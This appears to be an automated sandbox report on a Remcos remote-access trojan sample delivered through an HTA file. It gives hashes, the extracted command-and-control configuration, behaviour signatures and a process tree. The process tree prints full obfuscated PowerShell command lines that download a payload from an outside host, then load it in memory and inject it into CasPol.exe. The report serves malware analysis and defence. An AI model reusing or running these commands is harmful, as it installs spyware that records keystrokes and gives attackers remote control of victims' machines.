remcos | 23650e26608f6c5c065c8989912b168ec6fba89e759a1a7f3edbe27345e21e4b

Analysis

max time kernel
148s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
06-02-2025 10:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seethebewtthingstodothebestwayofgreatnessgod.hta
Size

15KB
MD5

b17075441c09b68399252230d95973af
SHA1

c4951ff30e5c1d76da15be8d097bb9c9b8514235
SHA256

23650e26608f6c5c065c8989912b168ec6fba89e759a1a7f3edbe27345e21e4b
SHA512

32e325fd879b2c00ede3a2c09348744bfc124b1984640e96ffcaf311b1fd60e63495fd6bf928bfa91cc0216400dedda383891804571667a42314c82efcd7ea9f
SSDEEP

48:3PCUlAEW2JlWjEW2wkkjr0AdbSdx399DdNRAAr5yK4/5hyKQlFlUEW28luG:/CU2EJsEhQpKJfrRHr5ylhyXz6E8n

Score

10^/10

remcos remotehost defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

216.9.226.100:3898

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
mic
mouse_option
false
mutex
Rmc-Q9T2QD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 3 IoCs

flow	pid	Process
23	4540	powershell.exe
26	3436	powershell.exe
27	3436	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
4540	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3436	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3436 set thread context of 4764	3436	powershell.exe	106

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4540	powershell.exe
4540	powershell.exe
3436	powershell.exe
3436	powershell.exe
3436	powershell.exe
3436	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4764	CasPol.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 1700 wrote to memory of 4464	1700	mshta.exe	86
PID 1700 wrote to memory of 4464	1700	mshta.exe	86
PID 1700 wrote to memory of 4464	1700	mshta.exe	86
PID 4464 wrote to memory of 4540	4464	cmd.exe	89
PID 4464 wrote to memory of 4540	4464	cmd.exe	89
PID 4464 wrote to memory of 4540	4464	cmd.exe	89
PID 4540 wrote to memory of 396	4540	powershell.exe	92
PID 4540 wrote to memory of 396	4540	powershell.exe	92
PID 4540 wrote to memory of 396	4540	powershell.exe	92
PID 396 wrote to memory of 3584	396	csc.exe	93
PID 396 wrote to memory of 3584	396	csc.exe	93
PID 396 wrote to memory of 3584	396	csc.exe	93
PID 4540 wrote to memory of 1016	4540	powershell.exe	99
PID 4540 wrote to memory of 1016	4540	powershell.exe	99
PID 4540 wrote to memory of 1016	4540	powershell.exe	99
PID 1016 wrote to memory of 3436	1016	WScript.exe	100
PID 1016 wrote to memory of 3436	1016	WScript.exe	100
PID 1016 wrote to memory of 3436	1016	WScript.exe	100
PID 3436 wrote to memory of 2820	3436	powershell.exe	105
PID 3436 wrote to memory of 2820	3436	powershell.exe	105
PID 3436 wrote to memory of 2820	3436	powershell.exe	105
PID 3436 wrote to memory of 4764	3436	powershell.exe	106
PID 3436 wrote to memory of 4764	3436	powershell.exe	106
PID 3436 wrote to memory of 4764	3436	powershell.exe	106
PID 3436 wrote to memory of 4764	3436	powershell.exe	106
PID 3436 wrote to memory of 4764	3436	powershell.exe	106
PID 3436 wrote to memory of 4764	3436	powershell.exe	106
PID 3436 wrote to memory of 4764	3436	powershell.exe	106
PID 3436 wrote to memory of 4764	3436	powershell.exe	106
PID 3436 wrote to memory of 4764	3436	powershell.exe	106
PID 3436 wrote to memory of 4764	3436	powershell.exe	106

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebewtthingstodothebestwayofgreatnessgod.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1700
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C pOwErsHell -eX BYPASs -NoP -W 1 -C deViCecreDENtialdEployMeNT.EXE ; IeX($(IEX('[SYStem.texT.eNcoDiNg]'+[char]58+[cHAr]0X3A+'uTF8.geTsTRIng([sYsTEM.COnvERT]'+[CHAr]0X3A+[Char]0x3A+'fromBAse64STring('+[chAR]34+'JG0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYkVSREVmaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFiWmhCY1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUp0LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByUXJMSEwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUNDKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZU1BWm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG06OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMTcuMTYwLjE2My4xMTMvNDUzL3NlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29kLmdJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXd0dGhpbmdzdG9kb3RoZWJlc3R3YXlvZmdyZWF0bmVzc2dvYmVzdC52YnMiLDAsMCk7c3RhUnQtc2xlZXAoMyk7aU5Wb2tFLWlUZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHNlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29iZXN0LnZicyI='+[char]0X22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4464
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwErsHell -eX BYPASs -NoP -W 1 -C deViCecreDENtialdEployMeNT.EXE ; IeX($(IEX('[SYStem.texT.eNcoDiNg]'+[char]58+[cHAr]0X3A+'uTF8.geTsTRIng([sYsTEM.COnvERT]'+[CHAr]0X3A+[Char]0x3A+'fromBAse64STring('+[chAR]34+'JG0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYkVSREVmaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFiWmhCY1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUp0LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByUXJMSEwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUNDKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZU1BWm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG06OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMTcuMTYwLjE2My4xMTMvNDUzL3NlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29kLmdJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXd0dGhpbmdzdG9kb3RoZWJlc3R3YXlvZmdyZWF0bmVzc2dvYmVzdC52YnMiLDAsMCk7c3RhUnQtc2xlZXAoMyk7aU5Wb2tFLWlUZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHNlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29iZXN0LnZicyI='+[char]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4540
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l13ibgof\l13ibgof.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:396
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2D5.tmp" "c:\Users\Admin\AppData\Local\Temp\l13ibgof\CSC7B7C6DE3A9B8463484EFF3883215D82.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3584
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebewtthingstodothebestwayofgreatnessgobest.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1016
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZABvAGcAcwBzAGUAbgB0AGEAZQByAGcAZgBvAHkAYQB3AHQAcwBlAGIAZQBoAHQAbwBkAG8AdABzAGcAbgBpAGgAdAB0AHcAZQBiAGUAaAB0AGUAZQBzAC8AMwA1ADQALwAzADEAMQAuADMANgAxAC4AMAA2ADEALgA3ADEAMgAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAZwBvAGgAdQA3AHMAbAB4AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAOAAwADYANgA5ADMALwBsADgAbABtAG8AMgA2AG8ANwByAGYAOABvAHkAZwByADEAMAB5ADkALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAEMAYQBzAFAAbwBsACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3436
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:2820
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mic\logs.dat

Filesize
102B

MD5
0657c753c35a0ab113684980f1c8d467

SHA1
1ae20a96b28826218fcdf2087425365c1c6a96b6

SHA256
c6115aca9be0e243bcd99e0452864c5ec1b680cb027a86ff0268fcf9695693eb

SHA512
9bf38cb0e807b2b915beda03723712e341633e2a8df16e024bf83ca4e65748abfc67378b5f102bdcce1579233d556ee0f3e607cdfb86e079e8173a3792206407

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
88e93d15d98a47acd872a07875140768

SHA1
6ae23b9c61696a5cb8b2448a6da4a7ee50e55c96

SHA256
344342d6f279556b7e8619c501f7f7969ec688f7e9d0c986ec67fe9ebe80e843

SHA512
2d896c6f5bb7175709ee08605e99b5e10080c85e2299d6444b6155a606c15299efc4ef2377f1f37ba1fa3a034cfd82943d75ed33c620fdf3359b8fe43f709ca5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB2D5.tmp

Filesize
1KB

MD5
b1b006f8fde5ff5cca630105cd6b4ca0

SHA1
10085e26db034736caecc03334601d5a7b50eb5f

SHA256
9f01cb4cd0517c42dbc4320e33225e5fa8e7635d1b7c4ba144f0a159fff1cecd

SHA512
283f9d3e9a0aa385dd77a912440fc79bc037dab04a28a2d053585a34ffccf902593fefc62c6900b79ca7c0cc753ec7c2bdbcaa360e44b0664d774fe8b2fbfcc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cl3ftdsb.0q3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\l13ibgof\l13ibgof.dll

Filesize
3KB

MD5
2ed696cc99a58c803e1498445fb77560

SHA1
5fb24d688b6c76645c089112c927a14df8d5b2c7

SHA256
0aa7d794d71feac20205550ade0830a22849d9d9dd8bbfccfdb27757e1355c7d

SHA512
2415dca6ee95902282becf57f6233b7bb4ef97b6b8480c40bac484d494c20d7a821136dff7060f2356c3c3beb054d1234930f834b210cb8cfc20a5221d443901

Download Submit
C:\Users\Admin\AppData\Roaming\seethebewtthingstodothebestwayofgreatnessgobest.vbs

Filesize
184KB

MD5
8cbb8e8c083138f50289f5722b80d0ec

SHA1
2e9d338f32146e76db9172c61cd95015de939983

SHA256
e574c7c03391b4142af0cfc89a23dc50eeb0573ec4922c6e3b3a032d0cd7a19e

SHA512
edb5c025fa91149cd6ac1364833eb46be5fb03fe0f586d24df00973e90a601b5499d97e47a6f8f618f1b1110721cc6ef81463fbae8021ce3309c1554966fabb5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l13ibgof\CSC7B7C6DE3A9B8463484EFF3883215D82.TMP

Filesize
652B

MD5
7345f923305e6de272d3701959926254

SHA1
ee047075bc5a61ccce66571d1cd9957df423ecdb

SHA256
866e7fb163c765977e416c046fce78d1e934903b08ae6b8c52198ec58a61a864

SHA512
60af59e177083b41653bc43942f40e321d3697205aa5e8d0c67fb62c61bfb41a115f7bdbd4423c05fd91c3b415f846d72c276454122137340dcb8a28088c87d3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l13ibgof\l13ibgof.0.cs

Filesize
459B

MD5
19403550f9bf1d9942a15391df03e6f0

SHA1
26306f174cd81bce51d8fc318693f4268f571fa4

SHA256
3d6d5d032a8c6d8e0bd23e514117ff1a62e24724dd1e93bbe29ead9a58d33fef

SHA512
851893286fc42013dde0507ead8775103eda3af5b7b8e82be156be063359f9ee2bfb660b482d608095871b74c4b960b98e24761ab52ba147158d8fd74c271b3a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l13ibgof\l13ibgof.cmdline

Filesize
369B

MD5
c86c9b93d17e857f8aa26d3b232e8fd5

SHA1
5c1d4f8edda0346a857bae3161a2f23842811cc6

SHA256
1f9e6f1d34ce42c930de575663a758e9e7f568c37fac1c3d3263df6c358e669f

SHA512
d81a2658fa56142e078c0b8e0b158e5007fa51625d9a64a226fcbe12350f4e081ef85220d6ed12143ba2e1cc4ac28a82fe2b452f0190bea8b01a7ba89935e2e9

Download Submit
memory/3436-87-0x0000000007740000-0x0000000007746000-memory.dmp

Filesize
24KB

Download
memory/3436-83-0x0000000005E40000-0x0000000006194000-memory.dmp

Filesize
3.3MB

Download
memory/3436-86-0x0000000007860000-0x00000000078FC000-memory.dmp

Filesize
624KB

Download
memory/3436-85-0x00000000077B0000-0x00000000077C2000-memory.dmp

Filesize
72KB

Download
memory/4540-66-0x00000000083C0000-0x0000000008964000-memory.dmp

Filesize
5.6MB

Download
memory/4540-37-0x0000000006E30000-0x0000000006E4A000-memory.dmp

Filesize
104KB

Download
memory/4540-19-0x0000000006390000-0x00000000063C2000-memory.dmp

Filesize
200KB

Download
memory/4540-34-0x0000000071470000-0x0000000071C20000-memory.dmp

Filesize
7.7MB

Download
memory/4540-35-0x0000000071470000-0x0000000071C20000-memory.dmp

Filesize
7.7MB

Download
memory/4540-36-0x0000000007790000-0x0000000007E0A000-memory.dmp

Filesize
6.5MB

Download
memory/4540-72-0x0000000071470000-0x0000000071C20000-memory.dmp

Filesize
7.7MB

Download
memory/4540-38-0x0000000007160000-0x000000000716A000-memory.dmp

Filesize
40KB

Download
memory/4540-39-0x0000000007380000-0x0000000007416000-memory.dmp

Filesize
600KB

Download
memory/4540-40-0x00000000072E0000-0x00000000072F1000-memory.dmp

Filesize
68KB

Download
memory/4540-41-0x0000000007310000-0x000000000731E000-memory.dmp

Filesize
56KB

Download
memory/4540-3-0x0000000005050000-0x0000000005678000-memory.dmp

Filesize
6.2MB

Download
memory/4540-43-0x0000000007360000-0x000000000737A000-memory.dmp

Filesize
104KB

Download
memory/4540-44-0x0000000007350000-0x0000000007358000-memory.dmp

Filesize
32KB

Download
memory/4540-18-0x0000000005DE0000-0x0000000005E2C000-memory.dmp

Filesize
304KB

Download
memory/4540-17-0x0000000005D90000-0x0000000005DAE000-memory.dmp

Filesize
120KB

Download
memory/4540-16-0x00000000057F0000-0x0000000005B44000-memory.dmp

Filesize
3.3MB

Download
memory/4540-6-0x0000000005680000-0x00000000056E6000-memory.dmp

Filesize
408KB

Download
memory/4540-57-0x0000000007350000-0x0000000007358000-memory.dmp

Filesize
32KB

Download
memory/4540-5-0x0000000004E00000-0x0000000004E66000-memory.dmp

Filesize
408KB

Download
memory/4540-4-0x0000000004CE0000-0x0000000004D02000-memory.dmp

Filesize
136KB

Download
memory/4540-64-0x0000000071470000-0x0000000071C20000-memory.dmp

Filesize
7.7MB

Download
memory/4540-65-0x0000000007610000-0x0000000007632000-memory.dmp

Filesize
136KB

Download
memory/4540-20-0x000000006DD30000-0x000000006DD7C000-memory.dmp

Filesize
304KB

Download
memory/4540-63-0x000000007147E000-0x000000007147F000-memory.dmp

Filesize
4KB

Download
memory/4540-33-0x0000000007060000-0x0000000007103000-memory.dmp

Filesize
652KB

Download
memory/4540-42-0x0000000007320000-0x0000000007334000-memory.dmp

Filesize
80KB

Download
memory/4540-21-0x0000000071470000-0x0000000071C20000-memory.dmp

Filesize
7.7MB

Download
memory/4540-2-0x0000000071470000-0x0000000071C20000-memory.dmp

Filesize
7.7MB

Download
memory/4540-22-0x000000006DEA0000-0x000000006E1F4000-memory.dmp

Filesize
3.3MB

Download
memory/4540-32-0x0000000006D90000-0x0000000006DAE000-memory.dmp

Filesize
120KB

Download
memory/4540-0-0x000000007147E000-0x000000007147F000-memory.dmp

Filesize
4KB

Download
memory/4540-1-0x00000000027B0000-0x00000000027E6000-memory.dmp

Filesize
216KB

Download
memory/4764-93-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-107-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-90-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-106-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-89-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-96-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-88-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-95-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-97-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-98-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-114-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-115-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-121-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-122-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-129-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4764-130-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download